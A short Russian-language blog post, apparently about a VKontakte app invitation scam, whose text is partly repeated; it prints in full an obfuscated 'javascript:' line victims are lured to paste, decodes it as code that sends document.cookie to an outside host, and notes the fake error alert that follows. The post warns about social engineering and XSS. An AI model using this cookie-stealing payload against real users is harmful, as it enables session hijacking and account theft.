Пригласили меня тут на днях добавить одно приложение «Вконтакте». Интерес взял верх — и я полез смотреть.
Вот, что я увидел:
Строка длинная, поэтому в поле ввода приложения не поместилась.
Приведу её полностью:
Всё довольно-таки тривиально: сначала выполняется скрипт, который отсылает куки недоброжелателю:
А, затем, пользователю alert'ом выдаётся сообщение:
«Не удается выполнить действие!»
Увидев которое, пользователь, хоть и огорчившись, но ничего не заподозрив, закрывает приложение.
Поэтому, хочется ещё раз сказать, что даже если будут закрыты все дыры в безопасности на сайтах, то всегда останется самый действенный во все времена способ — социальная инженерия.
P.S. Впервые столкнулся именно с таким проявлением социальной инженерии и XSS. Если повтор — извиняйте.
Вот, что я увидел:
Строка длинная, поэтому в поле ввода приложения не поместилась.
Приведу её полностью:
javascript:page=String.fromCharCode(105,109,103,61,110,101,119,32,73,109,97,103,101,40,41,59,105,
109,103,46,115,114,99,61,39,104,116,116,112,58,47,47,118,112,111,112,107,117,46,111,114,103,47,115,117,112,47,
115,46,112,104,112,63,113,61,39,43,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,59);
eval(page);
alert(unescape("%u041D%u0435%20%u0443%u0434%u0430%u0435%u0442%u0441%u044F%20%u0432%u044B%u043F%u043E%u043B%u043D%u0438%u0442%u044C%20%u0434%u0435%u0439%u0441%u0442%u0432%u0438%u0435%21"));Всё довольно-таки тривиально: сначала выполняется скрипт, который отсылает куки недоброжелателю:
img=new Image();
img.src='http://vpopku.org/sup/s.php?q='+document.cookie;А, затем, пользователю alert'ом выдаётся сообщение:
«Не удается выполнить действие!»
Увидев которое, пользователь, хоть и огорчившись, но ничего не заподозрив, закрывает приложение.
Поэтому, хочется ещё раз сказать, что даже если будут закрыты все дыры в безопасности на сайтах, то всегда останется самый действенный во все времена способ — социальная инженерия.
P.S. Впервые столкнулся именно с таким проявлением социальной инженерии и XSS. Если повтор — извиняйте.
